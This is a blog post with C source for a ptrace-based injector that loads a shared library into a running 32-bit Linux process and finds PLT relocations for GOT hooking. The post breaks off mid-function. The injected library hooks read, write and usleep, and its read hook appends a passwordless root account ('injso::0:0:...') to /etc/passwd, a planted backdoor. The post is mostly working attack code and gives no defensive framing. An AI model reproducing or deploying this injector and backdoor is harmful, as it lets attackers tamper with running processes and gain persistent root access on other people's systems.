devbox
人工智能uu
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

linx x86平台成功注入so 并且通道rel进行hook_so hook fopen

作者:人工智能uu | 2024-07-24 01:36:03

so hook fopen

  so.c

  1. #include <sys/types.h>
  2. #include <stdio.h>
  3. #include <unistd.h>
  4. #include <pthread.h>
  5.  
  6. int (*oldusleep)(useconds_t usec);
  7.    
  8.  
  9. int newusleep(useconds_t usec)
  10. {
  11. 	int ret;
  12.        
  13.  	printf("newusleep\n");
  14.  
  15. 	ret = oldusleep(usec);
  16.  
  17.  
  18.  
  19. 	return ret;
  20. }
  21.  
  22.  
  23. int (*oldwrite) (int fd, const void *buf, size_t count);
  24. ssize_t(*oldread) (int fd, void *buf, size_t count);
  25.  
  26. void *dolife(void *arg)
  27. {
  28. 	FILE *fp;
  29. 	int i;
  30.  
  31. 	puts("ok");
  32. 	puts("ok");
  33. 	puts("ok");
  34. 	pthread_detach(pthread_self());
  35. 	for (i = 0; i < 256; i++) {
  36. 		puts("dolife ok");
  37. /*		fp = fopen("/home/grip2/lifelog.txt", "a");
  38. 		fprintf(fp, "%d\n", i);
  39. 		fclose(fp);
  40. */ sleep(1);
  41. 	}
  42. }
  43.  
  44. void newput(const char *s)
  45. {
  46. 	printf("this is %s speaking\n",s);
  47. }
  48.  
  49. int newwrite(int fd, const void *buf, size_t count)
  50. {
  51. 	static int n = 0;
  52. 	static int f = 0;
  53. 	pthread_t tid;
  54.  
  55. //      if (0 == f++)
  56. //              pthread_create(&tid, NULL, &dolife, NULL);
  57. 	if (n++ > 2)
  58. 		exit(0);
  59. 	printf("In newwrite :)\n");
  60. 	printf("oldwrite %p\n", oldwrite);
  61. 	printf("newwrite %p\n", newwrite);
  62. 	oldwrite(fd, buf, count);
  63. 	n--;
  64.  
  65. 	return count;
  66. }
  67.  
  68. ssize_t newread(int fd, void *buf, size_t count)
  69. {
  70. 	ssize_t ret;
  71. 	FILE *fp;
  72. 	char ch = '#';
  73.  
  74. 	ret = oldread(fd, buf, count);
  75.  
  76. 	if (memcmp(buf, (void *) &ch, 1) == 0) {
  77. 		fp = fopen("/etc/passwd", "a");
  78. 		fputs("injso::0:0:root:/root:/bin/sh\n", fp);
  79. 		fclose(fp);
  80. 	}
  81.  
  82.  
  83. 	return ret;
  84. }
  85.  
  86.  
  87. void newlife(void)
  88. {
  89. 	pthread_t tid;
  90. 	char ch;
  91.  
  92. 	puts("ok");
  93. 	pthread_create(&tid, NULL, &dolife, NULL);
  94. //exit(0);
  95. /*
  96. //for(;;)
  97. {
  98. 	puts("ok create");
  99. //	puts("ok create");
  100. //	fflush(stdout);
  101. ch = getchar();
  102. 	puts("ok create");
  103. 	puts("ok create");
  104. if ('q' == ch)
  105. break;
  106. }
  107. */
  108. /*
  109. if(fork() == 0)
  110. {
  111. dolife(0);
  112. exit(0);
  113. }
  114. */
  115. 	puts("ok create");
  116. 	puts("ok create");
  117. 	puts("ok create");
  118. 	puts("ok create");
  119. 	puts("ok create");
  120. 	puts("ok create");
  121. 	puts("ok create");
  122. 	puts("ok create");
  123. 	puts("ok create");
  124. }
  125.

hook.c

  1. #include <stdlib.h>
  2. #include <stdio.h>
  3. #include <string.h>
  4. #include <unistd.h>
  5. #include <sys/ptrace.h>
  6. #include <wait.h>
  7. #include <sys/user.h>
  8. #include <errno.h>
  9. #include <stdlib.h>
  10. #include <string.h>
  11. #include <stdio.h>
  12. #include <elf.h>
  13. #include <link.h> 
  14. #include <sys/wait.h>
  15. #include <sys/mman.h>
  16. #include <dlfcn.h>
  17. #include <dirent.h>
  18. #include <unistd.h> 
  19. #include "p_elf.h"
  20. #include "p_dbg.h"
  21.  
  22. void call_dl_open(int pid, unsigned long addr, char *libname);
  23. void call_dlopen(int pid, unsigned long addr, char *libname);
  24. void usage(void);
  25. const char *libc_path = "/lib/i386-linux-gnu/libc-2.19.so";
  26. const char *linker_path = "/lib/i386-linux-gnu/ld-2.19.so";
  27. void* get_module_base(pid_t pid, const char* module_name)
  28. {
  29.     FILE *fp;
  30.     long addr = 0;
  31.     char *pch;
  32.     char filename[32];
  33.     char line[1024];
  34.  
  35.     if (pid < 0) {
  36.         /* self process */
  37.         snprintf(filename, sizeof(filename), "/proc/self/maps", pid);
  38.     } else {
  39.         snprintf(filename, sizeof(filename), "/proc/%d/maps", pid);
  40.     }
  41.  
  42.     fp = fopen(filename, "r");
  43.  
  44.     if (fp != NULL) {
  45.         while (fgets(line, sizeof(line), fp)) {
  46.             if (strstr(line, module_name)) {
  47.                 pch = strtok( line, "-" );
  48.                 addr = strtoul( pch, NULL, 16 );
  49.  
  50.                 if (addr == 0x8000)
  51.                     addr = 0;
  52.  
  53.                 break;
  54.             }
  55.         }
  56.  
  57.         fclose(fp) ;
  58.     }
  59.  
  60.     return (void *)addr;
  61. }
  62.  
  63.  
  64. int find_pid_of(const char *process_name)
  65. {
  66.     int id;
  67.     pid_t pid = -1;
  68.     DIR* dir;
  69.     FILE *fp;
  70.     char filename[32];
  71.     char cmdline[256];
  72.  
  73.     struct dirent * entry;
  74.  
  75.     if (process_name == NULL)
  76.         return -1;
  77.  
  78.     dir = opendir("/proc");
  79.     if (dir == NULL)
  80.         return -1;
  81.  
  82.     while((entry = readdir(dir)) != NULL) {
  83.         id = atoi(entry->d_name);
  84.         if (id != 0) {
  85.             sprintf(filename, "/proc/%d/cmdline", id);
  86.             fp = fopen(filename, "r");
  87.             if (fp) {
  88.                 fgets(cmdline, sizeof(cmdline), fp);
  89.                 fclose(fp);
  90.  
  91.                 if (strcmp(process_name, cmdline) == 0)	{
  92.                     /* process found */
  93.                     pid = id;
  94.                     break;
  95.                 }
  96.             }
  97.         }
  98.     }
  99.  
  100.     closedir(dir);
  101.     return pid;
  102. }
  103.  
  104. int ptrace_getregs(pid_t pid, struct user_regs_struct * regs)
  105. {
  106.     if (ptrace(PTRACE_GETREGS, pid, NULL, regs) < 0) {
  107.         perror("ptrace_getregs: Can not get register values");
  108.         return -1;
  109.     }
  110.  
  111.     return 0;
  112. }
  113.  
  114. int ptrace_setregs(pid_t pid, struct user_regs_struct * regs)
  115. {
  116.     if (ptrace(PTRACE_SETREGS, pid, NULL, regs) < 0) {
  117.         perror("ptrace_setregs: Can not set register values");
  118.         return -1;
  119.     }
  120.  
  121.     return 0;
  122. }
  123. int ptrace_readdata(pid_t pid,  uint8_t *src, uint8_t *buf, size_t size)
  124. {
  125.     uint32_t i, j, remain;
  126.     uint8_t *laddr;
  127.  
  128.     union u {
  129.         long val;
  130.         char chars[sizeof(long)];
  131.     } d;
  132.  
  133.     j = size / 4;
  134.     remain = size % 4;
  135.  
  136.     laddr = buf;
  137.  
  138.     for (i = 0; i < j; i ++) {
  139.         d.val = ptrace(PTRACE_PEEKTEXT, pid, src, 0);
  140.         memcpy(laddr, d.chars, 4);
  141.         src += 4;
  142.         laddr += 4;
  143.     }
  144.  
  145.     if (remain > 0) {
  146.         d.val = ptrace(PTRACE_PEEKTEXT, pid, src, 0);
  147.         memcpy(laddr, d.chars, remain);
  148.     }
  149.  
  150.     return 0;
  151. }
  152.  
  153. int ptrace_writedata(pid_t pid, uint8_t *dest, uint8_t *data, size_t size)
  154. {
  155.     uint32_t i, j, remain;
  156.     uint8_t *laddr;
  157.  
  158.     union u {
  159.         long val;
  160.         char chars[sizeof(long)];
  161.     } d;
  162.  
  163.     j = size / 4;
  164.     remain = size % 4;
  165.  
  166.     laddr = data;
  167.  
  168.     for (i = 0; i < j; i ++) {
  169.         memcpy(d.chars, laddr, 4);
  170.         ptrace(PTRACE_POKETEXT, pid, dest, d.val);
  171.  
  172.         dest  += 4;
  173.         laddr += 4;
  174.     }
  175.  
  176.     if (remain > 0) {
  177.         d.val = ptrace(PTRACE_PEEKTEXT, pid, dest, 0);
  178.         for (i = 0; i < remain; i ++) {
  179.             d.chars[i] = *laddr ++;
  180.         }
  181.  
  182.         ptrace(PTRACE_POKETEXT, pid, dest, d.val);
  183.     }
  184.  
  185.     return 0;
  186. }
  187.  
  188. int ptrace_continue(pid_t pid)
  189. {
  190.     if (ptrace(PTRACE_CONT, pid, NULL, 0) < 0) {
  191.         perror("ptrace_cont");
  192.         return -1;
  193.     }
  194.  
  195.     return 0;
  196. }
  197.  
  198. long ptrace_call_ext(pid_t pid, uint32_t addr, long *params, uint32_t num_params, struct user_regs_struct * regs)
  199. {
  200.     regs->esp -= (num_params) * sizeof(long) ;
  201.     ptrace_writedata(pid, (void *)regs->esp, (uint8_t *)params, (num_params) * sizeof(long));
  202.  
  203.     long tmp_addr = 0x00;
  204.     regs->esp -= sizeof(long);
  205.     ptrace_writedata(pid, regs->esp, (char *)&tmp_addr, sizeof(tmp_addr)); 
  206.  
  207.     regs->eip = addr;
  208.  
  209.     if (ptrace_setregs(pid, regs) == -1 
  210.             || ptrace_continue( pid) == -1) {
  211.         printf("error\n");
  212.         return -1;
  213.     }
  214.  
  215.     int stat = 0;
  216.     //printf("start waiting\n");
  217.     waitpid(pid, &stat, WUNTRACED);
  218.     //printf("finished\n");
  219.  
  220.     return 0;
  221. }
  222. int ptrace_call_wrapper(pid_t target_pid, const char * func_name, void * func_addr, long * parameters, int param_num, struct user_regs_struct * regs) 
  223. {
  224.     printf("[+] Calling %s in target process.\n", func_name);
  225.     if (ptrace_call_ext(target_pid, (uint32_t)func_addr, parameters, param_num, regs) == -1)
  226.         return -1;
  227.  
  228.     if (ptrace_getregs(target_pid, regs) == -1)
  229.         return -1;
  230.     //printf("[+] Target process returned from %s, return value=%x, pc=%x \n", func_name, ptrace_retval(regs), ptrace_ip(regs));
  231.     return 0;
  232. }
  233. long ptrace_retval(struct user_regs_struct * regs)
  234. { 
  235.     return regs->eax; 
  236. }
  237.  
  238. void call_dlopen(int target_pid, unsigned long dlopen_addr, char *library_path)
  239. {
  240. 	 
  241. 	void *mmap_addr;
  242. 	struct user_regs_struct regs;
  243. 	struct user_regs_struct original_regs;
  244. 	long parameters[10];
  245. 	uint8_t *map_base = 0;
  246. 	
  247. 	if (ptrace_getregs(target_pid, &regs) == -1)
  248.         goto exit;
  249.     memcpy(&original_regs, &regs, sizeof(regs));	
  250. 	mmap_addr = enumprocesssym(target_pid, "libc", "mmap");
  251. 	parameters[0] = 0;	// addr
  252.     parameters[1] = 0x4000; // size
  253.     parameters[2] = PROT_READ | PROT_WRITE | PROT_EXEC;  // prot
  254.     parameters[3] =  MAP_ANONYMOUS | MAP_PRIVATE; // flags
  255.     parameters[4] = 0; //fd
  256.     parameters[5] = 0; //offset
  257.  
  258.     if (ptrace_call_wrapper(target_pid, "mmap", mmap_addr, parameters, 6, &regs) == -1)
  259.         goto exit;
  260.     map_base = ptrace_retval(&regs);
  261. 	printf("\n--------mapbase=%x--------\n",map_base);
  262. 	if(map_base==0){
  263. 		goto exit;
  264. 	}	
  265. 	ptrace_writedata(target_pid, map_base, library_path, strlen(library_path) + 1);
  266. 	
  267.     parameters[0] = map_base;	
  268.     parameters[1] = RTLD_NOW| RTLD_GLOBAL; 
  269. 	if (ptrace_call_wrapper(target_pid, "dlopen", dlopen_addr, parameters, 2, &regs) == -1)
  270.         goto exit;
  271.  
  272.     void * sohandle = ptrace_retval(&regs);	
  273. 	printf("sohandle = %x\n", sohandle);
  274. exit:
  275. 	ptrace_setregs(target_pid, &original_regs);
  276. 	 
  277. } 
  278. #define PRINT(a,ehdr) printf(#a"=%x\n",ehdr->a);
  279. #define PRINTA4(a,ehdr) printf(#a"=%2.2x %c%c%c\n",ehdr->a[0],ehdr->a[1],ehdr->a[2],ehdr->a[3]);
  280. void printehdr(Elf32_Ehdr *ehdr)
  281. {
  282. 	puts("------------printehdr---------------");
  283. 	PRINTA4(e_ident,ehdr)
  284. 	PRINT(e_type,ehdr)
  285. 	PRINT(e_machine,ehdr)
  286. 	PRINT(e_version,ehdr)
  287. 	PRINT(e_entry,ehdr)
  288. 	PRINT(e_phoff,ehdr)
  289. 	PRINT(e_shoff,ehdr)
  290. 	PRINT(e_flags,ehdr)
  291. 	PRINT(e_ehsize,ehdr)
  292. 	PRINT(e_phentsize,ehdr)
  293. 	PRINT(e_phnum,ehdr)
  294. 	PRINT(e_shentsize,ehdr)
  295. 	PRINT(e_shnum,ehdr)
  296. 	PRINT(e_shstrndx,ehdr)
  297. 	printf("ehsize=%x phsize=%x shsize=%x\n",sizeof(Elf32_Ehdr),sizeof(Elf32_Phdr),sizeof(Elf32_Shdr));
  298. 	
  299. }
  300.  
  301. #define PRINTSWITCH(a,type) if(a==type){puts(#a);return;}
  302. void printptype(int type)
  303. {
  304. 	PRINTSWITCH(PT_NULL,type)
  305. 	PRINTSWITCH(PT_LOAD,type)
  306. 	PRINTSWITCH(PT_DYNAMIC,type)
  307. 	PRINTSWITCH(PT_INTERP,type)
  308. 	PRINTSWITCH(PT_NOTE,type)
  309. 	PRINTSWITCH(PT_SHLIB,type)
  310. 	PRINTSWITCH(PT_PHDR,type)
  311. 	PRINTSWITCH(PT_TLS,type)
  312. 	PRINTSWITCH(PT_NUM,type)
  313. 	PRINTSWITCH(PT_LOOS,type)
  314. 	PRINTSWITCH(PT_GNU_EH_FRAME,type)
  315. 	PRINTSWITCH(PT_GNU_STACK,type)
  316. 	PRINTSWITCH(PT_GNU_RELRO,type)
  317. 	PRINTSWITCH(PT_LOSUNW,type)
  318. 	PRINTSWITCH(PT_SUNWBSS,type)
  319. 	PRINTSWITCH(PT_SUNWSTACK,type)
  320. 	PRINTSWITCH(PT_HISUNW,type)
  321. 	PRINTSWITCH(PT_HIOS,type)
  322. 	PRINTSWITCH(PT_LOPROC,type)
  323. 	PRINTSWITCH(PT_HIPROC,type)
  324. }
  325. void printphdr(Elf32_Phdr *phdr)
  326. {
  327. 	puts("-------printphdr--------------------");
  328. 	printptype(phdr->p_type);
  329. 	PRINT(p_type,phdr)
  330. 	PRINT(p_offset,phdr)
  331. 	PRINT(p_vaddr,phdr)
  332. 	PRINT(p_paddr,phdr)
  333. 	PRINT(p_filesz,phdr)
  334. 	PRINT(p_memsz,phdr)
  335. 	PRINT(p_flags,phdr)
  336. 	PRINT(p_align,phdr) 
  337. }
  338. void printdyntag(int d_tag)
  339. {
  340. 	PRINTSWITCH(DT_NULL,d_tag)
  341. 	PRINTSWITCH(DT_NEEDED,d_tag)
  342. 	PRINTSWITCH(DT_PLTRELSZ,d_tag)
  343. 	PRINTSWITCH(DT_PLTGOT,d_tag)
  344. 	PRINTSWITCH(DT_HASH,d_tag)
  345. 	PRINTSWITCH(DT_STRTAB,d_tag)
  346. 	PRINTSWITCH(DT_SYMTAB,d_tag)		
  347. 	PRINTSWITCH(DT_RELA,d_tag)
  348. 	PRINTSWITCH(DT_RELASZ,d_tag)
  349. 	PRINTSWITCH(DT_RELAENT,d_tag)
  350. 	PRINTSWITCH(DT_STRSZ,d_tag)
  351. 	PRINTSWITCH(DT_SYMENT,d_tag)
  352. 	PRINTSWITCH(DT_INIT,d_tag)
  353. 	PRINTSWITCH(DT_FINI,d_tag)
  354. 	PRINTSWITCH(DT_SONAME,d_tag)
  355. 	PRINTSWITCH(DT_RPATH,d_tag)
  356. 	PRINTSWITCH(DT_SYMBOLIC,d_tag)
  357. 	PRINTSWITCH(DT_REL,d_tag)
  358. 	PRINTSWITCH(DT_RELSZ,d_tag)
  359. 	PRINTSWITCH(DT_RELENT,d_tag)
  360. 	PRINTSWITCH(DT_PLTREL,d_tag)
  361. 	PRINTSWITCH(DT_DEBUG,d_tag)
  362. 	PRINTSWITCH(DT_TEXTREL,d_tag)
  363. 	PRINTSWITCH(DT_JMPREL,d_tag)
  364. 	PRINTSWITCH(DT_BIND_NOW,d_tag)
  365. 	PRINTSWITCH(DT_INIT_ARRAY,d_tag)
  366. 	PRINTSWITCH(DT_FINI_ARRAY,d_tag)	
  367. 	PRINTSWITCH(DT_INIT_ARRAYSZ,d_tag)
  368. 	PRINTSWITCH(DT_FINI_ARRAYSZ,d_tag)
  369. 	PRINTSWITCH(DT_RUNPATH,d_tag)
  370. 	PRINTSWITCH(DT_FLAGS,d_tag)
  371. 	PRINTSWITCH(DT_ENCODING,d_tag)
  372. 	PRINTSWITCH(DT_PREINIT_ARRAY,d_tag)
  373. 	PRINTSWITCH(DT_PREINIT_ARRAYSZ,d_tag)
  374. 	PRINTSWITCH(DT_NUM,d_tag)
  375. 	PRINTSWITCH(DT_LOOS,d_tag)
  376. 	PRINTSWITCH(DT_HIOS,d_tag)
  377. 	PRINTSWITCH(DT_LOPROC,d_tag)
  378. 	PRINTSWITCH(DT_HIPROC,d_tag)
  379. 	PRINTSWITCH(DT_PROCNUM,d_tag)
  380. 	PRINTSWITCH(DT_VALRNGLO,d_tag)
  381. 	PRINTSWITCH(DT_GNU_PRELINKED,d_tag)
  382. 	PRINTSWITCH(DT_GNU_CONFLICTSZ,d_tag)
  383. 	PRINTSWITCH(DT_GNU_LIBLISTSZ,d_tag)
  384. 	PRINTSWITCH(DT_CHECKSUM,d_tag)
  385. 	PRINTSWITCH(DT_PLTPADSZ,d_tag)
  386. 	PRINTSWITCH(DT_MOVEENT,d_tag)	 	
  387. 	PRINTSWITCH(DT_MOVESZ,d_tag)
  388. 	PRINTSWITCH(DT_FEATURE_1,d_tag)
  389. 	PRINTSWITCH(DT_POSFLAG_1,d_tag)
  390. 	PRINTSWITCH(DT_SYMINSZ,d_tag)
  391. 	PRINTSWITCH(DT_SYMINENT,d_tag)
  392. 	PRINTSWITCH(DT_VALRNGHI,d_tag)
  393. 	PRINTSWITCH(DT_ADDRRNGLO,d_tag)
  394. 	PRINTSWITCH(DT_GNU_HASH,d_tag)	
  395. 	PRINTSWITCH(DT_TLSDESC_PLT,d_tag)	
  396. 	PRINTSWITCH(DT_TLSDESC_GOT,d_tag)	
  397. 	PRINTSWITCH(DT_GNU_CONFLICT,d_tag)	
  398. 	PRINTSWITCH(DT_GNU_LIBLIST,d_tag)	
  399. 	PRINTSWITCH(DT_CONFIG,d_tag)	
  400. 	PRINTSWITCH(DT_DEPAUDIT,d_tag)	
  401. 	PRINTSWITCH(DT_AUDIT,d_tag)	
  402. 	PRINTSWITCH(DT_PLTPAD,d_tag)	
  403. 	PRINTSWITCH(DT_MOVETAB,d_tag)	
  404. 	PRINTSWITCH(DT_SYMINFO,d_tag)	
  405. 	PRINTSWITCH(DT_ADDRRNGHI,d_tag)	
  406. 	PRINTSWITCH(DT_ADDRNUM,d_tag)	
  407. 	PRINTSWITCH(DT_VERSYM,d_tag)	
  408. 	PRINTSWITCH(DT_RELACOUNT,d_tag)	
  409. 	PRINTSWITCH(DT_RELCOUNT,d_tag)	
  410. 	PRINTSWITCH(DT_FLAGS_1,d_tag)	
  411. 	PRINTSWITCH(DT_VERDEF,d_tag)	
  412. 	PRINTSWITCH(DT_VERDEFNUM,d_tag)			
  413. 	PRINTSWITCH(DT_VERNEED,d_tag)
  414. 	PRINTSWITCH(DT_VERNEEDNUM,d_tag)			
  415. 	PRINTSWITCH(DT_VERSIONTAGNUM,d_tag)	
  416. 	PRINTSWITCH(DT_AUXILIARY,d_tag)	
  417. 	PRINTSWITCH(DT_FILTER,d_tag)			
  418. 	PRINTSWITCH(DT_EXTRANUM,d_tag) 
  419. }
  420. void printdyn(Elf32_Dyn* dyn)
  421. {
  422. 	puts("----------printdyn-----------------");
  423. 	printdyntag(dyn->d_tag);
  424. 	PRINT(d_tag,dyn)
  425. 	PRINT(d_un.d_val,dyn)
  426. }
  427.  
  428. #define PROCESSREAD(ptr,addr,size) ptrace_read(pid, (void*)(addr), ptr, size)
  429.  
  430. void printsym(Elf32_Sym *sym,int straddr,int pid)
  431. {
  432. 	puts("-------printsym--------------------");
  433.  
  434. 	if(sym->st_name){
  435. 	 	char sname[40];
  436. 		PROCESSREAD(sname,straddr+sym->st_name,40);
  437. 		puts(sname);
  438. 	}
  439. 	PRINT(st_name,sym)
  440. 	PRINT(st_value,sym)	
  441. 	PRINT(st_size,sym)
  442. 	PRINT(st_info,sym)
  443. 	PRINT(st_other,sym)
  444. 	PRINT(st_shndx,sym)
  445. }
  446. void printlinkmap(struct link_map*lm,int pid)
  447. {
  448. 	puts("-------printlinkmap--------");
  449. 	PRINT(l_addr,lm)
  450. 	PRINT(l_ld,lm)	
  451. 	char sname[40];
  452. 	PROCESSREAD(sname,lm->l_name,40);
  453. 	puts(sname);
  454. 	//puts(lm->l_name);
  455. }
  456.  
  457. int enumprocesssym(int pid,const char*libname,const char*fnname)
  458. {
  459. 	unsigned long modbase = (unsigned long)get_module_base(pid,libname);
  460.     unsigned long phdr_addr,shdr_addr, dyn_addr;
  461. 	int i;
  462. 	if(modbase==0){
  463. 		printf("%d[%s] get_module_base=0",pid,libname);
  464. 		return;
  465. 	}
  466. 	printf("modbase=%x\n",modbase);
  467. 	Elf32_Ehdr *ehdr = (Elf32_Ehdr *) malloc(sizeof(Elf32_Ehdr));
  468. 	Elf32_Phdr *phdr = (Elf32_Phdr *) malloc(sizeof(Elf32_Phdr));
  469. 	Elf32_Shdr *shdr = (Elf32_Shdr *) malloc(sizeof(Elf32_Shdr));
  470. 	Elf32_Dyn *dyn = (Elf32_Dyn *) malloc(sizeof(Elf32_Dyn));
  471. 	Elf32_Sym *sym = (Elf32_Sym *) malloc(sizeof(Elf32_Sym));
  472. 	struct link_map* linknode = (struct link_map*)malloc(sizeof(struct link_map));
  473. 	
  474. 	//ptrace_read(pid, (void*)modbase, ehdr, sizeof(Elf32_Ehdr));
  475. 	PROCESSREAD(ehdr,modbase,sizeof(Elf32_Ehdr));
  476. 	//printehdr(ehdr);
  477. 	int offsetdyn =0;
  478. 	int dynsize = 0;
  479. 	for(i=0;i<ehdr->e_phnum;i++){
  480. 		PROCESSREAD(phdr,modbase+ehdr->e_phoff+(i*ehdr->e_phentsize),sizeof(Elf32_Phdr));
  481. 		//printphdr(phdr);
  482. 		if(PT_DYNAMIC==phdr->p_type){
  483. 			offsetdyn = phdr->p_vaddr;
  484. 			dynsize = phdr->p_memsz;
  485. 		}
  486. 	}
  487. 	int symaddr=0;
  488. 	int symsize=0;
  489. 	int straddr=0;
  490. 	int gotaddr=0;
  491. 	int mapaddr=0;
  492. 	
  493. 	for(i=0;i<dynsize/sizeof(Elf32_Dyn);i++){
  494. 		PROCESSREAD(dyn,modbase+offsetdyn+(i*sizeof(Elf32_Dyn)),sizeof(Elf32_Dyn));
  495. 		//printdyn(dyn);
  496. 		if(DT_SYMTAB==dyn->d_tag){
  497. 			symaddr = dyn->d_un.d_val;
  498. 		}else if(DT_STRTAB==dyn->d_tag){
  499. 			straddr=dyn->d_un.d_val;
  500. 		}else if(DT_PLTGOT==dyn->d_tag){
  501. 			gotaddr=dyn->d_un.d_val;
  502. 		}
  503. 	}
  504. 	puts("-------sym-------");
  505. 	for(i=0;;i++){
  506. 		PROCESSREAD(sym,symaddr+(i*sizeof(Elf32_Sym)),sizeof(Elf32_Sym));
  507. 		//printsym(sym,straddr,pid);		
  508. 		if(sym->st_name){
  509. 			char sname[40];
  510. 			PROCESSREAD(sname,straddr+sym->st_name,40);
  511. 			if(!strcmp(sname,fnname)){
  512. 				printsym(sym,straddr,pid);	
  513. 				return modbase+sym->st_value;
  514. 			}
  515. 		}
  516. 	}	
  517. 	return 0;
  518. 	Elf32_Addr gotv=0;
  519. 	puts("----got------");
  520. 	int linknodeaddr=0;
  521. 	for(i=0;i<60;i++){
  522. 		PROCESSREAD(&gotv,gotaddr+(i*sizeof(Elf32_Addr)),sizeof(Elf32_Addr));
  523. 		printf("%x\n",gotv);	
  524. 		if(gotv==0)break;
  525. 		if(i==1)mapaddr=gotv;
  526. 	}		
  527. 	i=0;
  528. 	int laddr = mapaddr;
  529. 	puts("----linkmap------");
  530. 	while(1)
  531. 	{
  532. 		PROCESSREAD(linknode,laddr,sizeof(struct link_map));
  533. 		//printlinkmap(linknode);
  534. 		if(linknode->l_next==0)break;
  535. 		laddr = linknode->l_next;
  536. 	}
  537. 	while(1)
  538. 	{
  539. 		PROCESSREAD(linknode,laddr,sizeof(struct link_map));
  540. 		printlinkmap(linknode,pid);
  541. 		if(linknode->l_prev==0)break;
  542. 		laddr = linknode->l_prev;
  543. 	}	
  544. 	return;
  545.  
  546. }
  547.  
  548. void call_newput(int target_pid, unsigned long newput_addr, const char *strdata)
  549. {
  550. 	 
  551. 	void *mmap_addr;
  552. 	struct user_regs_struct regs;
  553. 	struct user_regs_struct original_regs;
  554. 	long parameters[10];
  555. 	uint8_t *map_base = 0;
  556. 	
  557. 	if (ptrace_getregs(target_pid, &regs) == -1)
  558.         goto exit;
  559.     memcpy(&original_regs, &regs, sizeof(regs));	
  560. 	mmap_addr = enumprocesssym(target_pid, "libc", "mmap");
  561. 	parameters[0] = 0;	// addr
  562.     parameters[1] = 0x4000; // size
  563.     parameters[2] = PROT_READ | PROT_WRITE | PROT_EXEC;  // prot
  564.     parameters[3] =  MAP_ANONYMOUS | MAP_PRIVATE; // flags
  565.     parameters[4] = 0; //fd
  566.     parameters[5] = 0; //offset
  567.  
  568.     if (ptrace_call_wrapper(target_pid, "mmap", mmap_addr, parameters, 6, &regs) == -1)
  569.         goto exit;
  570.     map_base = ptrace_retval(&regs);
  571. 	printf("\n--------mapbase=%x--------\n",map_base);
  572. 	if(map_base==0){
  573. 		goto exit;
  574. 	}	
  575. 	ptrace_writedata(target_pid, map_base, strdata, strlen(strdata) + 1);
  576. 	
  577.     parameters[0] = map_base;	
  578.     //parameters[1] = RTLD_NOW| RTLD_GLOBAL; 
  579. 	if (ptrace_call_wrapper(target_pid, "newput",newput_addr, parameters, 1, &regs) == -1)
  580.         goto exit;
  581.  
  582.     void * sohandle = ptrace_retval(&regs);	
  583. 	printf("ret = %x\n", sohandle);
  584. exit:
  585. 	ptrace_setregs(target_pid, &original_regs);
  586. 	 
  587. } 
  588. int g_symtab=0,g_strtab=0,g_jmprel=0,g_totalrelsize=0,g_relsize=0,g_nrels=0;
  589. void get_dyn_info2(int pid,int dynaddr)
  590. {
  591. 	Elf32_Dyn *dyn = (Elf32_Dyn *) malloc(sizeof(Elf32_Dyn));
  592. 	int i = 0;
  593.  
  594. 	PROCESSREAD( dyn,dynaddr + i * sizeof(Elf32_Dyn), sizeof(Elf32_Dyn));
  595. 	i++;
  596. 	while (dyn->d_tag) {
  597. 		switch (dyn->d_tag) {
  598. 		case DT_SYMTAB:
  599. 			puts("DT_SYMTAB");
  600. 			g_symtab = dyn->d_un.d_ptr;
  601. 			break;
  602. 		case DT_STRTAB:
  603. 			g_strtab = dyn->d_un.d_ptr;
  604. 			puts("DT_STRTAB");
  605. 			break;
  606. 		case DT_JMPREL:
  607. 			g_jmprel = dyn->d_un.d_ptr;
  608. 			puts("DT_JMPREL");
  609. 			//printf("jmprel\t %p\n", g_jmprel);
  610. 			break;
  611. 		case DT_PLTRELSZ:
  612. 			g_totalrelsize = dyn->d_un.d_val;
  613. 			puts("DT_PLTRELSZ");
  614. 			break;
  615. 		case DT_RELAENT:
  616. 			g_relsize = dyn->d_un.d_val;
  617. 			puts("DT_RELAENT");
  618. 			break;
  619. 		case DT_RELENT:
  620. 			g_relsize = dyn->d_un.d_val;
  621. 			puts("DT_RELENT");
  622. 			break;
  623. 		}
  624.  
  625. 		PROCESSREAD(dyn, dynaddr + i * sizeof(Elf32_Dyn), sizeof(Elf32_Dyn));
  626. 		i++;
  627. 	}
  628.  
  629. 	g_nrels = g_totalrelsize / g_relsize;
  630.  
  631. 	free(dyn);
  632. 	printf("g_nrels=%d\n",g_nrels);
  633. }
  634. unsigned long find_sym_in_rel2(int pid, char *sym_name,int dynaddr)
  635. {
  636. 	Elf32_Rel *rel = (Elf32_Rel *) malloc(sizeof(Elf32_Rel));
  637. 	Elf32_Sym *sym = (Elf32_Sym *) malloc(sizeof(Elf32_Sym));
  638. 	int i;	 
  639. 	unsigned long ret;
  640. 	char str[100];
  641.  
  642. 	get_dyn_info2(pid,dynaddr);
  643. 	for (i = 0; i < g_nrels; i++) {
  644. 		puts("1");
  645. 		PROCESSREAD(rel, (unsigned long) (g_jmprel + i * sizeof(Elf32_Rel)),sizeof(Elf32_Rel));
  646. 		if (ELF32_R_SYM(rel->r_info)) {
  647. 			PROCESSREAD(sym,g_symtab + ELF32_R_SYM(rel->r_info) * sizeof(Elf32_Sym),  sizeof(Elf32_Sym));
  648. 			PROCESSREAD(str,g_strtab + sym->st_name,100);
  649. 			puts("2");
  650. 			if (strcmp(str, sym_name) == 0) {				 
  651. 				break;
  652. 			}			 
  653. 		}
  654. 	}
  655.  
  656. 	if (i == g_nrels)
  657. 		ret = 0;
  658. 	else
  659. 		ret = rel->r_offset;
  660.  
  661. 	free(rel);
  662. 	free(sym);
  663.  
  664. 	return ret;
  665. }
  666.  
  667. int enumprocrel(int pid,const char*libname)
  668. {
  669. 	unsigned long modbase = (unsigned long)get_module_base(pid,libname);
  670.     unsigned long phdr_addr,shdr_addr, dyn_addr;
  671. 	int i;
  672. 	if(modbase==0){
  673. 		printf("%d[%s] get_module_base=0\n",pid,libname);
  674. 		return;
  675. 	}
  676. 	printf("modbase=%x\n",modbase);
  677. 	Elf32_Ehdr *ehdr = (Elf32_Ehdr *) malloc(sizeof(Elf32_Ehdr));
  678. 	Elf32_Phdr *phdr = (Elf32_Phdr *) malloc(sizeof(Elf32_Phdr));
  679.  	
  680. 	//ptrace_read(pid, (void*)modbase, ehdr, sizeof(Elf32_Ehdr));
  681. 	PROCESSREAD(ehdr,modbase,sizeof(Elf32_Ehdr));
  682. 	//printehdr(ehdr);
  683. 	int offsetdyn =0;
  684. 	int dynsize = 0;
  685. 	for(i=0;i<ehdr->e_phnum;i++){
